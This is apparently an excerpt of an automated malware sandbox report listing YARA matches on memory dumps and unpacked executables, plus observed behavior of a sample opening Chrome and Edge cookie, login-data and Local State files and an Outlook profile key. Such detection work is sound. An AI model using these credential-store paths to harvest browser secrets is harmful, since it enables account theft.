Source: Yara match File source: 00000002.00000002.2588682104.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3271543512.00000000041E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2590213953.00000000034A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0.2.file.exe.3016af4.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.302776c.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.302776c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.2fe3888.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.7d70000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.7d70000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.3271b14.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.3016af4.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.3273b2c.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.3270afc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2078835900.0000000007D70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2074359905.0000000003236000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2074359905.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\unlodctr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality

barindex
Source: Yara match File source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.3271480476.0000000000BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3270633150.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3271525357.0000000000C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3271198563.0000000001580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2588306707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2588682104.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3271543512.00000000041E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2590213953.00000000034A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0.2.file.exe.3016af4.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.302776c.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.302776c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.2fe3888.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.7d70000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.7d70000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.3271b14.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.3016af4.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.3273b2c.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.3270afc.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2078835900.0000000007D70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2074359905.0000000003236000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2074359905.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs